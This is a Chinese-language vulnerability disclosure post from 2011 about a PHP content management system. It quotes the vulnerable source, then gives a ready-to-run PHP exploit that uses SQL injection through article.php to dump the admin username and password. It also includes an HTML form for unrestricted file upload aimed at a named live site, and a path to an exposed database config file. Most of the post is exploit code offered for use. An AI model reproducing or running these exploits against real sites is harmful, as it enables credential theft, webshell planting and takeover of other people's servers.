漏洞作者:黑小子
公开时间:2011-09-20
漏洞类型:SQL注射
简要描述:
[pre]// pageArt.php //..略 $column = $_POST["column"]; $rownum = $_POST["rownum"]; $sql = " select id,title,addtime from lpc_article where column_id=".$column; //..略 其他类似文件..略 [/pre]
Exp:
[pre]<?php error_reporting(E_ERROR); print_r(' +---------------------------------------------------------------------+ Sql injection Vul Exploit Exp :黑小子 cfking Home: www.heixiaozi.com www.webvul.com 2011.09.20 +---------------------------------------------------------------------+ '); if ($argc < 2) { print_r(' Usage: php '.$argv[0].' host /path Example: php '.$argv[0].' www.heixiaozi.com test '); die(); } ob_start(); $host = $argv[1]; $path= $argv[2]; $sock = fsockopen($host, 80, $errno, $errstr, 30); if (!$sock) die("$errstr ($errno)\n"); fwrite($sock, "GET /article.php?id=255%20and%2201=2%20union+select+0,concat(0x63666B696E677339307365637E,uname,0x2D,upass,0x7E31),0,0,0,0,0,0+from+lpc_admin+LIMIT+0,1-- HTTP/1.1\r\n"); fwrite($sock, "Host: $host\r\n"); fwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/20100101 Firefox/6.0.2\r\n"); fwrite($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); fwrite($sock, "Accept-Language: zh-cn,zh;q=0.5\r\n"); fwrite($sock, "Connection: keep-alive\r\n\r\n"); $headers = ""; while ($str = trim(fgets($sock, 1024))) $headers .= "$str\n"; $body = ""; while (!feof($sock)) $body .= fgets($sock, 1024); fclose($sock); ob_end_flush(); //print_r($body); if (strpos($body, 'cfkings90sec') !== false) { preg_match('/cfkings90sec~(.*?)~1/', $body, $arr); $result=explode("-",$arr[1]); print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\n"); } else{ print_r("Exploit Failed! \n"); } ?> [/pre]
文件上传:
漏洞文件:admin/column/upload.php
[pre]admin/article/upload.php $upload_dir = '../..http://www.yunsec.net/uploads/'; $file_path = $upload_dir . $_FILES['myfile']['name']; $MAX_SIZE = 20000000; echo $_POST['buttoninfo']; ...... if($_FILES['myfile']['size']>$MAX_SIZE) echo "上传的文件大小超过了规定大小"; if($_FILES['myfile']['size'] == 0) echo "请选择上传的文件"; if(!move_uploaded_file( $_FILES['myfile']['tmp_name'], $file_path)) echo "复制文件失败,请重新上传"; [/pre]
两个文件都没任何限制!
Exp:
<metahttp-equiv="Content-Type"content="text/html;charset=gb2312"/>
<formenctype="multipart/form-data"action="http://www.yunsec.net/admin/column/upload.php"method="post">
<p>上传后网站跟目录http://www.yunsec.net/uploads/你上传的文件名<p>
<inputtype="file"name="myfile"size="20">
<inputtype="submit"value="Upload">
</form>
信息泄漏:
10 http://www.yunsec.net/admin/lib/db/config.xml
|
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡